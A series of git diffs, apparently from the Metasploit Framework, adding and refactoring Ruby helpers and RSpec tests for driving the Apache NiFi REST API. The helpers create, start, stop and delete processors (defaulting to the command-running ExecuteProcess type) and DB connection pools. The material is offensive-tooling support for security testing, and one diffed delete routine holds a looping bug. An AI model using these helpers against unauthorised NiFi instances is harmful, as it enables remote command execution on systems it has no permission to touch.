@@ -22,16 +28,23 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("PUTting disable status for db connection pool #{db_con_pool}", response, 200)
+    res = send_request_cgi(opts)
+    raise DBConnectionPoolError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Stop sent successfully')
   end
 
   # Delete DB Connection Pool
   #
   # @param token [String] The bearer token from a valid login
   # @param db_con_pool [String] UUID of the DBConnectionPool
-  def delete_dbconnectionpool(token, db_con_pool)
-    version = 0
+  # @param version [Integer] version of the DBConnectionPool to delete
+  def delete_dbconnectionpool(token, db_con_pool, version = 0)
+    vprint_status("Attempting to delete version #{version} of DB Connection Pool: #{db_con_pool}")
     opts = {
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool),
@@ -40,21 +53,31 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
       }
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
-      version += 1
+    res = send_request_cgi(opts)
+    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
       vprint_status("Found newer revision of #{db_con_pool}, attempting to delete version #{version}")
-      opts['vars_get'] = { 'version' => version }
-      response = send_request_cgi(opts)
+      delete_dbconnectionpool(token, db_con_pool, version += 1)
     end
-    check_response("DELETing db connection pool #{db_con_pool}", response, 200)
+    raise DBConnectionPoolError if res.nil?
+
+    if version == 20
+      print_bad("Aborting after attempting to delete 20 version of DB Connection Pool: #{db_con_pool}")
+      raise DBConnectionPoolError
+    end
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Delete sent successfully')
   end
 
   # Start DB Connection Pool
   #
   # @param token [String] The bearer token from a valid login
   # @param db_con_pool [String] UUID of the DBConnectionPool
-  def start_dbconpool(token, db_con_pool)
+  def start_dbconnectionpool(token, db_con_pool)
+    vprint_status("Attempting to start DB Connection Pool: #{db_con_pool}")
     body = {
       'disconnectedNodeAcknowledged' => false,
       'state' => 'ENABLED',
@@ -71,7 +94,57 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("PUTting start status for db connection pool #{db_con_pool}", response, 200)
+    res = send_request_cgi(opts)
+    raise DBConnectionPoolError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Start sent successfully')
+  end
+
+  # Create DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param name [String] Name to give to the db connection pool
+  # @param process_group [String] UUID of the process_group
+  # @param nifi_version [String] version number of the nifi instance
+
+  def create_dbconnectionpool(token, name, process_group, nifi_version)
+    vprint_status("Attempting to create DB Connection Pool in Process Group: #{process_group}")
+    body = {
+      'revision' =>
+          {
+            'clientId' => 'x',
+            'version' => 0
+          },
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'type' => 'org.apache.nifi.dbcp.DBCPConnectionPool',
+        'bundle' => {
+          'group' => 'org.apache.nifi',
+          'artifact' => 'nifi-dbcp-service-nar',
+          'version' => nifi_version.to_s
+        },
+        'name' => name
+      }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', process_group, 'controller-services'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise DBConnectionPoolError if res.nil?
+
+    unless res.code == 201
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Created successfully')
+    res.get_json_document['id']
   end
 end

--- a/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
@@ -1,0 +1,77 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
+  # Stop DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param db_con_pool [String] UUID of the DBConnectionPool
+  def stop_dbconnectionpool(token, db_con_pool)
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'state' => 'DISABLED',
+      'uiOnly' => true,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("PUTting disable status for db connection pool #{db_con_pool}", response, 200)
+  end
+
+  # Delete DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param db_con_pool [String] UUID of the DBConnectionPool
+  def delete_dbconnectionpool(token, db_con_pool)
+    version = 0
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool),
+      'vars_get' => {
+        'version' => version
+      }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      vprint_status("Found newer revision of #{db_con_pool}, attempting to delete version #{version}")
+      opts['vars_get'] = { 'version' => version }
+      response = send_request_cgi(opts)
+    end
+    check_response("DELETing db connection pool #{db_con_pool}", response, 200)
+  end
+
+  # Start DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param db_con_pool [String] UUID of the DBConnectionPool
+  def start_dbconpool(token, db_con_pool)
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'state' => 'ENABLED',
+      'uiOnly' => true,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("PUTting start status for db connection pool #{db_con_pool}", response, 200)
+  end
+end

--- a/lib/msf/core/exploit/remote/http/nifi/processor.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/processor.rb
@@ -1,0 +1,122 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Nifi::Processor
+  # Start processor
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of the processes
+  def start_processor(token, processor)
+    body = {
+      'state' => 'RUNNING',
+      'disconnectedNodeAcknowledged' => false,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("PUTting processor #{processor} configuration", response, 200)
+  end
+
+  # Stop processor
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of the processes
+  def stop_processor(token, processor)
+    body = {
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 1
+      },
+      'state' => 'STOPPED'
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("PUTting processor #{processor} stop command", response, 200)
+
+    # Stop may not have worked (but must be done first). Terminate threads now
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'threads')
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("DELETEing processor #{processor} terminate threads command", response, 200)
+  end
+
+  # Delete a processor
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of the processes
+  # @param version [Int] The version number to delete
+  def delete_processor(token, processor, version = 0)
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor),
+      'vars_get' => { 'version' => version }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    # if we tried to delete the old revision, go ahead and delete the newer one
+    # arbitrary version limit of 20
+    while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}")
+      opts['vars_get'] = { 'version' => version }
+      response = send_request_cgi(opts)
+    end
+
+    check_response("DELETEting processor #{processor}", response, 200)
+  end
+
+  # Creates a processor in a process group
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param process_group [String] UUID of a processor group
+  # @param type [String] What type of processor to create
+  # @return [String] The UUID of the root process group
+  def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
+    body = {
+      'component' => { 'type' => type },
+      'revision' => { 'version' => 0 }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', process_group, 'processors'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
+  end
+
+  # Get a processor in a process group
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of a processoror
+  # @param field [String] the key from the JSON blob to return
+  # @return [String] THe value from the specified field
+  def get_processor(token, processor, field = 'id')
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor)
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("GETting processor #{processor}", response, 200, field)
+  end
+end

--- a/lib/msf/core/exploit/remote/http/nifi/processor.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/processor.rb
@@ -1,173 +1,147 @@
-# -*- coding: binary -*-
+# -*- coding:binary -*-
 
-module Msf::Exploit::Remote::HTTP::Nifi::Processor
-  include Msf::Exploit::Remote::HttpClient
+require 'spec_helper'
 
-  class ProcessorError < StandardError
+RSpec.describe Msf::Exploit::Remote::HTTP::Nifi::Processor do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
   end
 
-  # Start processor
-  #
-  # @param token [String] The bearer token from a valid login
-  # @param processor [String] UUID of the processes
-  def start_processor(token, processor)
-    vprint_status("Attempting to start Processor: #{processor}")
-    body = {
-      'state' => 'RUNNING',
-      'disconnectedNodeAcknowledged' => false,
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 0
-      }
-    }
-    opts = {
-      'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    res = send_request_cgi(opts)
-    raise ProcessorError if res.nil?
-
-    unless res.code == 200
-      print_bad("Unexpected response code: #{res.code}")
-      raise ProcessorError
-    end
-    print_good('Processor Start sent successfully')
+  let(:valid_code) do
+    200
   end
 
-  # Stop processor
-  #
-  # @param token [String] The bearer token from a valid login
-  # @param processor [String] UUID of the processes
-  def stop_processor(token, processor)
-    vprint_status("Attempting to stop Processor: #{processor}")
-    body = {
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 1
-      },
-      'state' => 'STOPPED'
-    }
-    opts = {
-      'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    res = send_request_cgi(opts)
-    raise ProcessorError if res.nil?
+  describe '#nifi Processor start_processor' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
 
-    unless res.code == 200
-      print_bad("Unexpected response code: #{res.code}")
-      raise ProcessorError
+      expect { subject.start_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
     end
 
-    # Stop may not have worked (but must be done first). Terminate threads now
-    opts = {
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'threads')
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    res = send_request_cgi(opts)
-    raise ProcessorError if res.nil?
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
 
-    unless res.code == 200
-      print_bad("Unexpected response code: #{res.code}")
-      raise ProcessorError
+      expect { subject.start_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
     end
-    print_good('Processor Start stop successfully')
+
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.start_processor('a', 'a')).to be_nil
+    end
   end
 
-  # Delete a processor
-  #
-  # @param token [String] The bearer token from a valid login
-  # @param processor [String] UUID of the processes
-  # @param version [Int] The version number to delete
-  def delete_processor(token, processor, version = 0)
-    vprint_status("Attempting to delete version #{version} of Processor: #{processor}")
-    opts = {
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor),
-      'vars_get' => { 'version' => version }
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    res = send_request_cgi(opts)
-    # if we tried to delete the old revision, go ahead and delete the newer one
-    # arbitrary version limit of 20
-    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
-      vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}")
-      opts['vars_get'] = { 'version' => version }
-      delete_processor(token, processor, version += 1)
+  describe '#nifi Processor stop_processor' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect { subject.stop_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
     end
 
-    raise ProcessorError if res.nil?
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
 
-    if version == 20
-      print_bad("Aborting after attempting to delete 20 version of Processor: #{processor}")
-      raise ProcessorError
+      expect { subject.stop_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
     end
 
-    unless res.code == 200
-      print_bad("Unexpected response code: #{res.code}")
-      raise ProcessorError
+    it 'returns nil when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = ''
+        res
+      end
+
+      expect(subject.stop_processor('a', 'a')).to be_nil
     end
-    print_good('Delete sent successfully')
   end
 
-  # Creates a processor in a process group
-  #
-  # @param token [String] The bearer token from a valid login
-  # @param process_group [String] UUID of a processor group
-  # @param type [String] What type of processor to create
-  # @return [String] The UUID of the root process group
-  def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
-    vprint_status("Attempting to create of processor in group: #{process_group} of type #{type}")
-    body = {
-      'component' => { 'type' => type },
-      'revision' => { 'version' => 0 }
-    }
-    opts = {
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', process_group, 'processors'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    res = send_request_cgi(opts)
-    return nil if res.nil?
+  describe '#nifi Processor create_processor' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
 
-    unless res.code == 201
-      print_bad("Unexpected response code: #{res.code}")
-      raise ProcessorError
+      expect { subject.create_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
     end
-    res.get_json_document['id']
+
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.create_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'returns UUID when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 201
+        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
+        res
+      end
+
+      expect(subject.create_processor('a', 'a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
+    end
   end
 
-  # Get a processor in a process group
-  #
-  # @param token [String] The bearer token from a valid login
-  # @param processor [String] UUID of a processoror
-  # @param field [String] the key from the JSON blob to return
-  # @return [String] THe value from the specified field
-  def get_processor_field(token, processor, field = 'id')
-    vprint_status("Attempting to get field #{field} of processor: #{processor}")
-    opts = {
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor)
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    res = send_request_cgi(opts)
+  describe '#nifi Processor get_processor_field' do
+    it 'raises error if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
 
-    return nil if res.nil?
-
-    unless res.code == 200
-      print_bad("Unexpected response code: #{res.code}")
-      raise ProcessorError
+      expect { subject.get_processor_field('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
     end
 
-    res.get_json_document[field]
+    it 'raises error when unexpected response code is received' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = ''
+        res
+      end
+
+      expect { subject.get_processor_field('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    end
+
+    it 'returns UUID when successfull' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 200
+        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
+        res
+      end
+
+      expect(subject.get_processor_field('a', 'a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
+    end
   end
 end

--- a/lib/msf/core/exploit/remote/http/nifi/processor.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/processor.rb
@@ -1,147 +1,176 @@
-# -*- coding:binary -*-
+# -*- coding: binary -*-
 
-require 'spec_helper'
+module Msf::Exploit::Remote::HTTP::Nifi::Processor
+  include Msf::Exploit::Remote::HttpClient
 
-RSpec.describe Msf::Exploit::Remote::HTTP::Nifi::Processor do
-  subject do
-    mod = ::Msf::Module.new
-    mod.extend described_class
-    mod
+  class ProcessorError < StandardError
   end
 
-  let(:valid_code) do
-    200
+  # Start processor
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of the processes
+  def start_processor(token, processor)
+    vprint_status("Attempting to start Processor: #{processor}")
+    body = {
+      'state' => 'RUNNING',
+      'disconnectedNodeAcknowledged' => false,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Processor Start sent successfully')
   end
 
-  describe '#nifi Processor start_processor' do
-    it 'raises error if page can not be reached' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response::E404.new
-        res
-      end
+  # Stop processor
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of the processes
+  def stop_processor(token, processor)
+    vprint_status("Attempting to stop Processor: #{processor}")
+    body = {
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 1
+      },
+      'state' => 'STOPPED'
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
 
-      expect { subject.start_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
     end
 
-    it 'raises error when unexpected response code is received' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = 400
-        res.body = ''
-        res
-      end
+    # Stop may not have worked (but must be done first). Terminate threads now
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'threads')
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
 
-      expect { subject.start_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
     end
-
-    it 'returns nil when successfull' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = valid_code
-        res.body = ''
-        res
-      end
-
-      expect(subject.start_processor('a', 'a')).to be_nil
-    end
+    print_good('Processor Stop sent successfully')
   end
 
-  describe '#nifi Processor stop_processor' do
-    it 'raises error if page can not be reached' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response::E404.new
-        res
-      end
+  # Delete a processor
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of the processes
+  # @param version [Int] The version number to delete
+  def delete_processor(token, processor, version = 0)
+    vprint_status("Attempting to delete version #{version} of Processor: #{processor}")
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor),
+      'vars_get' => { 'version' => version }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    
+    raise ProcessorError if res.nil?
 
-      expect { subject.stop_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      opts['vars_get'] = { 'version' => version }
+
+      res = send_request_cgi(opts)
+      raise ProcessorError if res.nil?
+
+      vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}") if res.code == 400 && res.body.include?('is not the most up-to-date revision')
     end
 
-    it 'raises error when unexpected response code is received' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = 400
-        res.body = ''
-        res
-      end
-
-      expect { subject.stop_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    if version == 20
+      print_bad("Aborting after attempting to delete 20 version of Processor: #{processor}")
+      raise ProcessorError
     end
 
-    it 'returns nil when successfull' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = valid_code
-        res.body = ''
-        res
-      end
-
-      expect(subject.stop_processor('a', 'a')).to be_nil
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
     end
+    print_good('Processor Delete sent successfully')
   end
 
-  describe '#nifi Processor create_processor' do
-    it 'raises error if page can not be reached' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response::E404.new
-        res
-      end
+  # Creates a processor in a process group
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param process_group [String] UUID of a processor group
+  # @param type [String] What type of processor to create
+  # @return [String] The UUID of the root process group
+  def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
+    vprint_status("Attempting to create of processor in group: #{process_group} of type #{type}")
+    body = {
+      'component' => { 'type' => type },
+      'revision' => { 'version' => 0 }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', process_group, 'processors'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    return nil if res.nil?
 
-      expect { subject.create_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    unless res.code == 201
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
     end
-
-    it 'raises error when unexpected response code is received' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = 400
-        res.body = ''
-        res
-      end
-
-      expect { subject.create_processor('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
-    end
-
-    it 'returns UUID when successfull' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = 201
-        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
-        res
-      end
-
-      expect(subject.create_processor('a', 'a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
-    end
+    res.get_json_document['id']
   end
 
-  describe '#nifi Processor get_processor_field' do
-    it 'raises error if page can not be reached' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response::E404.new
-        res
-      end
+  # Get a processor in a process group
+  #
+  # @param token [String] The bearer token from a valid login
+  # @param processor [String] UUID of a processoror
+  # @param field [String] the key from the JSON blob to return
+  # @return [String] THe value from the specified field
+  def get_processor_field(token, processor, field = 'id')
+    vprint_status("Attempting to get field #{field} of processor: #{processor}")
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor)
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
 
-      expect { subject.get_processor_field('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
+    return nil if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
     end
 
-    it 'raises error when unexpected response code is received' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = 400
-        res.body = ''
-        res
-      end
-
-      expect { subject.get_processor_field('a', 'a') }.to raise_error(Msf::Exploit::Remote::HTTP::Nifi::Processor::ProcessorError)
-    end
-
-    it 'returns UUID when successfull' do
-      allow(subject).to receive(:send_request_cgi) do
-        res = Rex::Proto::Http::Response.new
-        res.code = 200
-        res.body = '{"id":"628de124-3d0f-11ee-be56-0242ac120002"}'
-        res
-      end
-
-      expect(subject.get_processor_field('a', 'a')).to eq('628de124-3d0f-11ee-be56-0242ac120002')
-    end
+    res.get_json_document[field]
   end
 end

--- a/lib/msf/core/exploit/remote/http/nifi/processor.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/processor.rb
@@ -1,11 +1,17 @@
 # -*- coding: binary -*-
 
 module Msf::Exploit::Remote::HTTP::Nifi::Processor
+  include Msf::Exploit::Remote::HttpClient
+
+  class ProcessorError < StandardError
+  end
+
   # Start processor
   #
   # @param token [String] The bearer token from a valid login
   # @param processor [String] UUID of the processes
   def start_processor(token, processor)
+    vprint_status("Attempting to start Processor: #{processor}")
     body = {
       'state' => 'RUNNING',
       'disconnectedNodeAcknowledged' => false,
@@ -21,8 +27,14 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("PUTting processor #{processor} configuration", response, 200)
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Processor Start sent successfully')
   end
 
   # Stop processor
@@ -30,6 +42,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
   # @param token [String] The bearer token from a valid login
   # @param processor [String] UUID of the processes
   def stop_processor(token, processor)
+    vprint_status("Attempting to stop Processor: #{processor}")
     body = {
       'revision' => {
         'clientId' => 'x',
